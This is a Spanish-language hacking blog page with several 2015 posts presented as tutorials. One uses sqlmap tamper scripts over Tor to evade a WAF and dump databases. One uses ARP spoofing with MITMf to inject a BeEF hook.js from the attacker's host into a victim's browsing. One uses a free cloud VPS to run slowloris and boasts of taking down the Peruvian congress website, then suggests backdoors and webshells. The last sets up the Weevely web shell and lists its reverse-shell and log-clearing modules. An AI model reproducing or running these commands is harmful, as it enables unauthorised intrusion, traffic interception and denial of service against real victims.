jueves, 29 de octubre de 2015

Bypasseando WAF con Sqlmap & Tamper


Saludos mis fieles lectores estuve leyendo algunos mensajes de mis seguidores y me comentaban lo siguiente ¿Como Bypassear el WAF de los servidores web para ataques de inyección SQL? ya que no hay mucha información sobre que tipo de de insertacion que contienen cada tamper en sus payloads, me tomare la molestia de pasarlo a explicar.

¿Que es un WAF?  

WAF - Web Application Firewall (Aplicación de corta fuegos Web), es un servicio de filtros contra ataques de código malicioso como los conocidos "XSS" - Cross-Site-Scripting, "SQL inyección", "RFI" - Remote File Inclusión, "DoS" - Denegación de servicios, "DDoS" - Distribución de denegación de servicios, entre otros ataques detectados pasaran a ser bloqueados por este servicio de filtros.


Existen muchos, pero algunos conocidos y familiarizados con la mayoría de plataformas son:



  1. ModSecurity
  2. Naxsi-Nginx


¿Que es un Tamper?

Un Tamper es un aplicativo open source creado en python compatible con sqlmap, para las funciones de insertar payloads camuflados, mediante envíos de peticiones de sintaxis a la base de datos burlando algunas aplicaciones de protección web, como los conocidos "WAF"

La ubicación los tampers se encuentren en el siguiente directorio: /usr/share/sqlmap/tamper


Funciones y codificaciones de los Tamper mas utilizados


--------------------------------------------------------------------------------------------------------------------------
space2comment.py         - Sustituye un carácter de espacio >>  " ( ' ') ", con inserciones ' / ** /' 
--------------------------------------------------------------------------------------------------------------------------
charencode.py                 - codifica todos los caracteres con numérico   44%20%54%20% 
--------------------------------------------------------------------------------------------------------------------------
base64encode.py            - convierte todo los caracteres en codificación base64 
'MScgQU5EIFNMRUVQKDUpIw=='
--------------------------------------------------------------------------------------------------------------------------
randomcomments.py     - Añade comentarios al azar mediante búsquedas de palabras MySQL
'I/**/N/**/SERT'
--------------------------------------------------------------------------------------------------------------------------
versionedkeywords.py   - Especifica cada palabra clave de versión de búsqueda MySQL 
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR
--------------------------------------------------------------------------------------------------------------------------
space2randomblank.py - Sustituye carácter de espacio ('') con un carácter en blanco al azar 'SELECT%0Did%0DFROM%0Ausers' 
--------------------------------------------------------------------------------------------------------------------------
modsecurityversioned.py ejecuta consulta completa con comentario versionado 
'1 /*!30874AND 2>1*/--'
--------------------------------------------------------------------------------------------------------------------------
equaltolike.py - Reemplaza todas las apariciones de operador igual ('=') con el operador 'LIKE'
'SELECT * FROM users WHERE id LIKE 1'
--------------------------------------------------------------------------------------------------------------------------
randomcase.py - Reemplaza cada personaje de palabras clave con el valor de caso fortuito 'INseRt'
--------------------------------------------------------------------------------------------------------------------------

Ojo: cada tamper tiene como función única para uno o varios tipos de lenguajes de base de datos. 

Si desean saber mas funciones de algunos Tamper's pueden verlo en los repertorios de cada uno en el siguiente enlace:


https://github.com/sqlmapproject/sqlmap/tree/master/tamper

Burlando WAF mediante SQL inyección 


En esta oportunidad escogí un servidor web como conejillo de indias para poder llevar acabo el servicio de ataque, en mi caso haré una inyección en el parámetro GET  vulnerable con los comandos básicos de sqlmap con el TOR.

sqlmap -u http://www.ejemplopaginaweb.com/galeria.php?categoria=2 --tor --check-tor --tor-port=9150 --tor-type=SOCKS5 --level=5 --risk=3 --random-agent

Si bien es cierto el testeo nos arroja que es "Inyectable", luego para nuestra mala suerte nos arroja que es un falso positivo, pero concatena sintaxis, en el parámetro categoría

Entonces al ejecutar el servidor de un falso positivo,me pide que ejecute el "--no-cast"para cargar los payload para el testeo de los nombres de las base se datos, muchos ya se hubieran rendido porque este proceso en su mayoría no es tan útil al momento de extraer las tablas o columnas de la base de datos.

Entonces observando que el servidor esta en MySQL puedo añadir el tamper space2comment, pero también puedo jugar con otro tamper añadiéndolo al testeo como charencode.

root@kali:~# sqlmap -u http://www.ejemplopaginaweb.com/galeria.php?categoria=2 --tor --tor-port=9150 --tor-type=SOCKS5 --tamper="space2comment,charencode.py" --level=5 --risk=3 -v 3 --random-agent --dbs --no-cast 


vemos que nuestro testeo esta corriendo y vemos aviso del WAF, ya que hemos personalizado el TEST con un escaneo mas extenso gracias al servicio Verbose que le añadimos el rango 3,  -v 3 enviamos una petición carácter y numérica, entonces nuestro payload se esta ejecutando con perfección

Hemos burlado el WAF y por ende extraído las base de datos de dicho servidor, mientras hay otros tamper que son detectados por los corta fuegos, dándonos como mensaje lo siguiente:

es por eso que se deben interactuar con cada tamper para que trate de bypassear los diferentes tipos de WAF, para poder ejecutar las sentencias de ofuscación, recuerden que cada Tamper esta elaborad para cada tipo de estructura de lenguaje web, como jsp, asp, aspx, php.

Compatibilidad de los tamper con los tipos de estructuras de base de  datos:

MySQL
  • space2randomblank,
  • unionalltounion
  •  unmagicquotes
  • versionedkeywords
  • versionedmorekeywords
  • xforwardedforbetween
  • bluecoat
  • charencode
  • charunicodeencode
  • concat2concatws
  • equaltolike
  • greatest
  • halfversionedmorekeywords
  • ifnull2ifisnull
  • space2morehash
  • space2mysqldash
  • space2plus
  • modsecurityversioned
  • modsecurityzeroversioned
  • multiplespaces
  • securesphere
  • space2comment
  • space2hash 
  • nonrecursivereplacement
  • percentage
  • randomcase
 MSSQL:
  • sp_password
  • space2comment
  • space2dash
  • space2mssqlblank
  • space2mysqldash
  • space2plus
  • space2randomblank
  • charencode
  • charunicodeencode
  • equaltolike
  • greatest
  • unionalltounion
  • unmagicquotes
  • multiplespaces
  • nonrecursivereplacement
  • percentage
  • randomcase
  • securesphere
MSAccess:
  • modsecurityversioned
  • modsecurityzeroversioned
  • equaltolike
  • greatest
  • halfversionedmorekeywords
  • nonrecursivereplacement
  • percentage
  • randomcase
  • securesphere
  • between
  • bluecoat
  • charencode
  • charunicodeencode
  • concat2concatws
  • space2comment
  • space2hash
  • space2morehash
  • space2mysqldash
  • space2plus
  • space2randomblank
  • unionalltounion
  • unmagicquotes
  • versionedkeywords
  • versionedmorekeywords
  • ifnull2ifisnull
  • multiplespaces
PostgreSQL:
  • xforwardedfor
  • space2comment
  • space2plus
  • space2randomblank
  • between
  • charencode
  • charunicodeencode
  • equaltolike
  • greatest
  • multiplespaces
  • nonrecursivereplacement
  • percentage
  • randomcase
  • securesphere
  • between


SQLite:
  • space2plus
  • unionalltounion
  • unmagicquotes
  • xforwardedfor
  • ifnull2ifisnull
  • randomcase
  • securesphere
  • space2comment
  • space2dashmmultiplespaces
  • nonrecursivereplacement
Saludos!!

jueves, 22 de octubre de 2015

MITM / Man in the middle - Ettercap + MITMF + Beef Exploiting + Metasploit

Main in the middle o hombre en el medio es un ataque en la cual nosotros estaremos en el medio entre los ordenadores y el rooter capturando el trafico de datos con una metodología que pasare a explicar sin tecnicismo en una imagen:


cuando una ordenador hace una petición a un servicio su procedimiento normal es que esta tiene que pasar al rooter y posteriormente al internet, en nuestro caso si la victima hace una petición a un servicio nosotros vamos a recibir los datos en texto plano recolectando datos de información en primer plano, el segundo envió seria al  rooter y luego al internet, en esta oportunidad voy a utilizar Ettercap la cual es una herramienta en código abierto que nos permitirá ejecutar el ataque.

Primer escenario Ettercap


En mi caso ejecutare la plataforma GUI, lo que haremos sera dirigimos a la primera pestaña que les aparecerá primero en el Ettercap daremos en "Sniff", luego de ello escogeremos nuestra interface de red, en mi caso es Eth0, automáticamente pasara a iniciar el servidor de snnifeo, luego nos dirigimos a la opción que parece en la imagen  entraremos a "Hosts" y luego procederá a hacer un análisis de rangos para ver las IP'S o ordenadores conectados ahora mismo, de igual manera escuchara a las entrantes conexiones entrantes en cualquier momento.  

Listado de red lo puedo ver en "Hosts" >> Hosts List


la IP de mi sistema de red es 192.168.179.129 , la de mi victima sera la primera que es 192.168.179.2  una ves identificado a quien haré el ataque procederemos a lanzar el ataque de la siguiente manera.

Luego de ello le daremos en aceptar, ya que estamos estableciendo una conexión entra nuestro sistema con la de la victima, luego de ello iremos a la opción "Mitm" y daremos en "ARP":

luego de ello le daremos en primera opción "para establecer el sniffeo remoto.



al aceptar completamente ya tendríamos el envenenamiento ARP establecido, entonces lo que haré en mi caso sera utilizar driftnet, que es un capturador de imágenes remotas  de sistemas comprometidos en tiempo real, solamente añadimos nuestra interface en mi caso fue #Eth0

 root@kali:~# driftnet -i eth0



Una ves establecido nuestro capturar, al momento que la victima entre a un servidor podemos capturar el trafico de imágenes,  un ejemplo mi victima esta en la siguiente web:

Nuestra victima ni siquiera sospechara nada, ya que hemos infectado la red por ende la explotación se basa en las conexiones de entrada y escucha, entonces pasamos a nuestro ordenador y vemos las imágenes capturadas:

Si desean capturar el trafico de datos en texto plano, les dejare un articulo en donde enseño el método:

http://backtrack-omar.blogspot.pe/2015/10/capturando-e-interceptando-datos-de-red.html 

Segundo escenario MITMF


MITMf tiene como objetivo proporcionar una ventanilla única para los ataques Man in the Middle y la red durante la actualización y la mejora de los ataques y técnicas existentes.

Originalmente construido para hacer frente a las deficiencias significativas de otras herramientas por ejemplo Ettercap, Mallory, ha sido re-escrito casi completamente desde cero para proporcionar un framework modular y fácilmente extensible que cualquiera puede utilizar para implementar su propio ataque MITM.

descarga:
https://github.com/byt3bl33d3r/MITMf/

Lo primero que haremos sera actualizar algunos repertorios que necesitara para ejecutar sus capacidades utilitarias.

root@kali:~# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev 


Lo que haremos sera descargar el MITMF y proceder a instalar sus requerimientos para que pueda funcionar correctamente:

root@kali:~# git clone https://github.com/byt3bl33d3r/MITMf
root@kali:~# cd MITMf && git submodule init && git submodule update --recursive
root@kali:~# pip install -r requirements.txt
root@kali:~# pip install virtualenvwrapper

Una ves completado todo eso, ya tendremos nuestra herramienta lista para ser usada pero antes que nada necesitaremos enfocarnos en una victima la cual sera la misma 192.168.179.2, pero antes de ello utilizaremos "BeEF" para crear nuestro servidor de infección y activarlo.
Para configuar BeFF y añadir los módulos de metasploit puede ver el siguiente articulo:

http://backtrack-omar.blogspot.pe/2015/10/beef-browser-exploitation-framework.html

En este caso lo que haremos sera utilizar el script hook.js, ya que podemos inyectar este código malicioso en los navegadores en los servidores web que la victima entre sin que se de cuenta, para ello utilizaremos BeEF para enviarlo remotamente con el envenenamiento ARP

root@kali:~# python mitmf.py --spoof --arp -i eth0 --gateway 192.168.179.2 --target 192.168.179.132 --inject --js-url http://192.168.179.129:3000/hook.js

-i identificamos el tipo interface en mi caso "eth0", --gateway es el servicio rooter y por ende --target la ip de la victima.


entonces ya tenemos listo nuestra conexión main in the middle para infectarlo directamente al momento que la victima entre a cualquier pagina web, en mi caso mi victima entro a una pagina de adultos "Nuevamente" jajaja.

al momento que la victima entre nosotros en primer plano tendremos los datos DNS:

Como vemos vemos los datos de la victima, la cual utiliza windows 7 conectado al navegador Firefox y vemos la URL donde se inyecto el código, otro plano abriremos el panel de BeFF y tendremos su sesión captura, con la cual podemos explotar a nuestra victima.

Aqui unos metodos de explotacion: 

http://backtrack-omar.blogspot.pe/2015/10/beef-browser-exploitation-framework.html


Atacando con metasploit:




En metasploit seria aprovechar el MITMF mediante el exploit de java hace poco tiempo nuevamente hay nuevos exploit para explotar nuevos complementos:

Módulos nuevos:


   Name                                                               Disclosure Date  Rank       Description

auxiliary/server/browser_autopwn2
exploit/multi/browser/adobe_flash_hacking_team_uaf
exploit/multi/browser/adobe_flash_nellymoser_bof 
exploit/multi/browser/adobe_flash_net_connection_confusion
exploit/multi/browser/adobe_flash_opaque_background_uaf
exploit/multi/browser/adobe_flash_shader_drawing_fill 
exploit/multi/browser/adobe_flash_shader_job_overflow 

http://backtrack-omar.blogspot.pe/2015/09/2015-flash-0day-exploit-hackingteam.html 

root@kali:~# python mitmf.py --spoof --arp -i eth0 --gateway 192.168.179.2 --target 192.168.179.132 --inject --js-url (añadiran el payload del exploit que les carge en metasploit)


de igual manera puedes añadir : payloads ejecutables para que lo descarge y ejecute para explotar al sistema, siempre y claro deben dejarlo FUD, aqui el post para hacer tu payload indetectable:

http://backtrack-omar.blogspot.pe/2015/10/evadiendo-av-codificando-payloads-con.html

Diferentes técnicas para crear tus payload:

http://backtrack-omar.blogspot.pe/2015/10/unicorn-la-herramienta-de-infeccion.html
http://backtrack-omar.blogspot.pe/2015/10/winrar-nuestro-viejo-aliado-de.html
http://backtrack-omar.blogspot.pe/2015/10/pupy-remote-administration-tool.html


Espere los aya gustado este articulo !!, un saludo para todas mis amistades.

Saludos y éxitos!

miércoles, 21 de octubre de 2015

Exploiting dedicated web services developers



Saludos fieles lectores en esta oportunidad, tengo algo que les encantara hace momentos me enviaron un vídeo de algunos Rat Kids, que utilizaban servicios de programación en linea todos ellos subían archivos escritos en perl  solamente para hacer un flooder enviando paquetes al puerto  UDP 80, obteniendo la IP de sus victimas, mediante la tecnica de IP resolver Skype, dejare algunos servicios online:

http://skypegrab.net/resolver.php
http://www.skresolver.com
http://www.resolveskype.org

en mi caso tengo uno privado con los módulos completos, hace meses lo liberaron un foro carder en fin, seguramente ya la liberaron, en fin esto no es el tema que tocare,  es el método de los niños rata que doy como "ejemplo" de lo que solamente hacen con eso.




Educando a los rat kids

Estuve observando ese vídeo y como le dije el método de la terminal ya tiene tiempo que se ejecutada dichos procesos pero hoy en día los niños ratas queman todo, al nosotros crear una cuenta en una plataforma de desarrollo de programación, los servidores añaden maquinas virtuales  que otorgan a cada usuario por defauld en su dedicado (VPS), que en su mayoría tienen privilegios ROOT, en este articulo aprenderemos aprovecharnos de esto y penetrar el sistema de diferentes maneras jugando al crazy code, uno de los servicios que a sido tan quemado, pero aun funciona para hacer algunas practicas de testeo de banda ancha con herramientas que añadidas  a un vps, podría colapsar plataformas web con buena banda ancha, el dominio es el siguiente:

 https://koding.com

como en todo servicio enfocados a estas plataformas siempre nos pedirá que nos registremos para poder acceder al servicio correctamente, una ves añadido  lo siguiente, les pedirá que añaden el código de activación procederemos a entrar a la plataforma, pero siempre se creara nuestra "Maquina virtual", para entrar a nuestra propia consola.




una ves que se cree nos arrojara a la plataforma del sistema:

las personas que han manejado o manejan sistema linux, puede observar que no solamente añadimos código de programación, si no que al ver la terminal con nuestro nombre de usuario la curiosidad mato esta ves al sistema jaja,



lo que haré en esta oportunidad sera darle una clase de como hacer una verdadera denegación de servicio, este es el vídeo de un niño rata:

 https://www.youtube.com/watch?v=K-ShFTL97Lk

si vieron el vídeo, creo que ustedes como personas con conocimiento podrán observar porque deseo educar a estos jóvenes con mala orientación, aunque por algo se empieza entonces que sigan su camino en todo este tiempo, mis deseos es que aprendan de la forma correcta.

lo que haré sera añadir el código del denegador de servicios por excelencia slowloris,  añadiremos la source en un nuevo archivo y lo guardaremos.

source:

https://ghostbin.com/paste/hvqz3

Post que elabore hace años:

http://backtrack-omar.blogspot.pe/2013/02/blog-post_3.html

siguiente con lo nuestro, añadiremos el source a nuestro archivo creado en extensión .pl , mi archivo lo llame " academia.pl "

como podemos observar el archivo esta en el servidor, entonces lo que haré sera ejecutar el slowloris con su comando por defauld para verificar las opciones que tiene.

obs, nos tiro un error en la cual nos dice que no esta instalado el repertorio SOCKET, la cual slowloris tiene como conexión de envío entonces como lo haremos? , es simple estamos en una terminal solamente ejecutamos apt-get install ( con el nombre del repertorio) , las cuales son los siguientes:

sudo apt-get install libio-socket-inet6-perl

sudo apt-get install libio-socket-multicast-perl

sudo apt-get install libio-socket-ssl-perl

Una ves añadidos nuestra terminal nos arroja los datos de instalación por defecto aparecerán:

Una ves se instale todos ejecutaremos el ataque en mi caso añadí mis configuraciones del slowloris privadas mía por ende esta ves no podre dárselas y empezara a enviar peticiones grandes enviados por el dedicado:

Una prueba de concepto hice el ataque en la siguiente web: www.congreso.gob.pe , la cual le envió la web a un colega mio que me confirmo que estaba caído, para estar 100 % podemos verificarlos en

 http://downforeveryoneorjustme.com


Pero es solo denegación de servicio no es gran cosa, les enseñare otros métodos con algunas web que eh estado investigado con las cuales pueden practicar.

Como podemos observar la compatibilidad que escogí del servicio fue un lenguaje php, incorporado con MySQL, Apache 2.4 , de igual manera podemos ejecutar comandos en la terminal, lo que añadi fue un script añadiendo una cookie que sera mi puerta trasera para conectarme desde mi terminal de linux que es compatible con Backcokkie, la cual el articulo de uso lo pueden ver aquí mismo:

http://backtrack-omar.blogspot.pe/2015/10/backcookie-la-herramienta-de-conexion.html

 una ves añadido el source pasara a guardarlo y activaremos nuestro servidor, una ves completado ejecutaremos el backcookie:

de igual manera pueden utilizar otro backdoor como "Weevely" para comprometer todo el sistema, les dejare el post que elabore hace pocos dias.

http://backtrack-omar.blogspot.com/2015/10/fix-weevely-30-install-requeriment-in.html

otro tipo de ataque también puede ser subir una webshell y tomar control de acceso de todos los servicios que conté el servidor mediante un Symlinking o Rooting, en mi caso solamente subiré la webshell del Team Albariam:

Deseas aprender a utilizar esta webshell y aprender symlinkg, tengo un vídeo de hace años de mi auditoria la cual los ayudara

https://www.youtube.com/watch?v=StHPklINE_s



de igual manera pueden conectar sus servicios mediante Putty, siempre y cuando en su plataforma tenga su SSH con sus credenciales para que se conecten al dedicado mismo, sin mas que decir espero les aya gustado este POST, un saludo !!

lunes, 19 de octubre de 2015

Fix Weevely 3.0 install requeriment in Kali Linux



Saludos fieles lectores en esta oportunidad enseñare a como fixear el Weevely, en nuestro kali linux,
Weevely es una shell de línea de comandos web ampliado dinámicamente por la red en tiempo de ejecución diseñado para la administración remota y la prueba de la testeo. proporciona una consola tipo telnet a través de un código en php que se ejecutara en el objetivo remotamente, incluso en ambientes restringidos.

el proceso ejecuta el footprint  y más de 30 módulos con metasploit extensible para administrar, llevar a cabo una prueba de testeo, después de la hazaña, y auditar la web remotamente con el fin de acceder como escalar privilegios para un análisis profundo en las redes internas.

Los módulos incluyen:


  • Terminal de red Shell / PHP telnet 
  • Errores de configuración de servidor común de auditoría
  • Consola de SQL pivotando en el blanco
  • Proxy tráfico HTTP a través de destino
  • Monte el sistema de archivos de destino para el punto de montaje local
  • Análisis de red Conducta pivotantes en el blanco
  • Carga de archivos y la descarga
  • Inversa de Spawn y  TCP directos
  • Cuentas de servicios de fuerza bruta
  • Comprimir y descomprimir zip, gzip, bzip2 y alquitrán archivos

Referencia: https://github.com/epinna/weevely3

Antes que nada, vamos a actualizar nuestro weevely en este caso, kali linux. para ellos pasaremos a descargar el archivo y a proceder a la instalación de dependencias.

Este post lo hice ya que hace momentos uno de mis colegas mi pidió que le ayudase a reparar el fallo, ya que no podría ejecutar la conexión  remota y por ende les salían errores de lineas de código:

como vemos, directamente el código no dice que  faltan módulos para que se ejecute la conexiones mediante sock, entonces lo que haré sera instalación la  versión con sus repertorios actualizando de Pysocks :

--------------------------------------------------------------------------------------------------------------------------
root@kali:~# git clone https://github.com/Anorov/PySocks.git
root@kali:~# chmod 775 *
root@kali:~# python setup.py build
root@kali:~# python setup.py install
--------------------------------------------------------------------------------------------------------------------------

una ves instalado todo los repertorios socks, pasaremos a ejecutar el weevely que llega por defauld en el kali linux:

Si desean descargas la nueva versión, con algunos complementos nuevos lo pueden hacer de la siguiente manera.

Aprendiendo algunos comandos 

:audit_filesystem - Auditando carpetas el sistema

:audit_etcpasswd - El archivo / etc / passwd es la base de datos basada en texto plano de información sobre los usuarios del sistema dedicado, la cual puede ser aprovechado para una recolección de datos aprovechados para un symlinkg.

:system_info - Información del sistema 
:uname -a     - información del kernel 
:net_ifconfig - lista rangos del servicio


Otros comandos :


  1. :audit_filesystem     Audit system files for wrong permissions.                            
  2.  :audit_etcpasswd      Get /etc/passwd with different techniques.                           
  3.  :audit_phpconf        Audit PHP configuration.                                             
  4.  :audit_suidsgid       Find files with SUID or SGID flags.                                  
  5.  :shell_sh             Execute Shell commands.                                              
  6.  :shell_su             Elevate privileges with su command.                                  
  7.  :shell_php            Execute PHP commands.                                                
  8.  :system_extensions    Collect PHP and webserver extension list.                            
  9.  :system_info          Collect system information.                                          
  10.  :backdoor_reversetcp  Execute a reverse TCP shell.                                         
  11.  :backdoor_tcp         Spawn a shell on a TCP port.                                         
  12.  :bruteforce_sql       Bruteforce SQL database.                                             
  13.  :file_find            Find files with given names and attributes.                          
  14.  :file_upload          Upload file to remote filesystem.                                    
  15.  :file_grep            Print lines matching a pattern in multiple files.                    
  16.  :file_enum            Check existence and permissions of a list of paths.                  
  17.  :file_clearlog        Simple Clear Log                                                     
  18.  :file_rm              Remove remote file.                                                  
  19.  :file_edit            Edit remote file on a local editor.                                  
  20.  :file_upload2web      Upload file automatically to a web folder and get corresponding URL. 
  21.  :file_bzip2           Compress or expand bzip2 files.                                      
  22.  :file_cp              Copy single file.                                                    
  23.  :file_check           Get remote file information.                                         
  24.  :file_read            Read remote file from the remote filesystem.                         
  25.  :file_touch           Change file timestamp.                                               
  26.  :file_mount           Mount remote filesystem using HTTPfs.                                
  27.  :file_cd              Change current working directory.                                    
  28.  :file_gzip            Compress or expand gzip files.                                       
  29.  :file_zip             Compress or expand zip files.                                        
  30.  :file_webdownload     Download URL to the filesystem                                       
  31.  :file_download        Download file to remote filesystem.                                  
  32.  :file_tar             Compress or expand tar archives.                                     
  33.  :file_ls              List directory content.                                              
  34.  :sql_console          Execute SQL query or run console.                                    
  35.  :sql_dump             Multi dbms mysqldump replacement.                                    
  36.  :net_phpproxy         Install PHP proxy on the target.                                     
  37.  :net_proxy            Proxify local HTTP traffic passing through the target.               
  38.  :net_scan             TCP Port scan.                                                       
  39.  :net_mail             Send mail.                                                           
  40.  :net_curl             Perform a curl-like HTTP request.                                    
  41.  :net_ifconfig         Get network interfaces addresses.

Sin mas que decir, no hace falta ejecutar algunos owned a dicho servidor por motivos de etica, ante mano espero les aya gustado este articulo!

Happy hacking!!!

Datos del Autor

Estudiante de Ingeniería de computación y sistemas en Perú.
actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.

"Me considero un novato en busca de conocimiento"


Entradas Populares